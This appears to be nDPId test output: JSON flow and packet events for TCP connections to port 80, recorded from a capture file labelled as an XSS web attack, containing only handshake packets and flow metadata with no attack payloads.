+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347178540,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347178540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRdAAD4GGLmsEAABwKgKMtSeAFA54BjBAAAAAKACchCAZAAAAgQFtAQCCAoBObXWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1J7RuWV+OeAYwqAScSC+2wAAAgQFtAQCCAoD44dMATm11gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1499347178541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347178541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRhAAD4GGMCsEAABwKgKMtSeAFA54BjC0bllf4AQAOVd4wAAAQEICgE5tdYD44dM"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347181178,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181178,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iI9AAD4GPUGsEAABwKgKMtS4AFBWujDmAAAAAKACchBIuAAAAgQFtAQCCAoBObhpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1LiEJRdhVrow56AScSAgTQAAAgQFtAQCCAoD44ngATm4aQEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1499347181179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347181179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iJBAAD4GPUisEAABwKgKMtS4AFBWujDnhCUXYoAQAOW\/UwAAAQEICgE5uGoD44ng"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347182435,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347182435,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IhAAD4G6UesEAABwKgKMtTGAFDgpGUsAAAAAKACchCJPgAAAgQFtAQCCAoBObmkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1MbnFi1c4KRlLaAScSDmrAAAAgQFtAQCCAoD44saATm5pAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1499347182436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347182436,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03IlAAD4G6U6sEAABwKgKMtTGAFDgpGUt5xYtXYAQAOWFtAAAAQEICgE5uaQD44sa"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347183714,"flow_last_seen":1499347183714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347183714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1499347183714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/NBAAD4GyP+sEAABwKgKMtTUAFAdl0YzAAAAAKACchBp+AAAAgQFtAQCCAoBObrjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1499347183715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183715,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1NRZfFQSHZdGNKAScSAtCwAAAgQFtAQCCAoD44xaATm64wEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1499347183715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347183715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/NFAAD4GyQasEAABwKgKMtTUAFAdl0Y0WXxUE4AQAOXMEQAAAQEICgE5uuQD44xa"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347186286,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347186286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C2FAAD4Gum+sEAABwKgKMtTuAFDJ67YHAAAAAKACchBLMgAAAgQFtAQCCAoBOb1mAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1O6dKYTkyeu2CKAScSCXQgAAAgQFtAQCCAoD447dATm9ZgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1499347186287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347186287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C2JAAD4GunasEAABwKgKMtTuAFDJ67YInSmE5YAQAOU2SQAAAQEICgE5vWcD447d"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347187548,"flow_last_seen":1499347187548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347187548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1499347187548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aSdAAD4GXKmsEAABwKgKMtT8AFBu8NeFAAAAAKACchCDZQAAAgQFtAQCCAoBOb6iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1499347187549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1PzTvrB4bvDXhqAScSBsEQAAAgQFtAQCCAoD45AYATm+ogEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1499347187549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347187549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aShAAD4GXLCsEAABwKgKMtT8AFBu8NeG076weYAQAOULGQAAAQEICgE5vqID45AY"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347188799,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347188799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dE1AAD4GUYOsEAABwKgKMtUKAFDFBMuWAAAAAKACchA3+QAAAgQFtAQCCAoBOb\/bAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Qqv+uT2xQTLl6AScSAOsgAAAgQFtAQCCAoD45FRATm\/2wEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1499347188800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347188800,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dE5AAD4GUYqsEAABwKgKMtUKAFDFBMuXr\/rk94AQAOWtuQAAAQEICgE5v9sD45FR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347190051,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347190051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88xNAAD4G0rysEAABwKgKMtUYAFBhEDIAAAAAAKACchA0PgAAAgQFtAQCCAoBOcETAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1RhSQOITYRAyAaAScSBqWwAAAgQFtAQCCAoD45KKATnBEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1499347190052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347190052,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08xRAAD4G0sOsEAABwKgKMtUYAFBhEDIBUkDiFIAQAOUJYgAAAQEICgE5wRQD45KK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347191299,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a9RAAD4GWfysEAABwKgKMtUmAFBoHamYAAAAAKACchC0UQAAAgQFtAQCCAoBOcJMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Sai+IEWaB2pmaAScSD5ewAAAgQFtAQCCAoD45PCATnCTAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1499347191300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347191300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a9VAAD4GWgOsEAABwKgKMtUmAFBoHamZoviBF4AQAOWYgwAAAQEICgE5wkwD45PC"} 
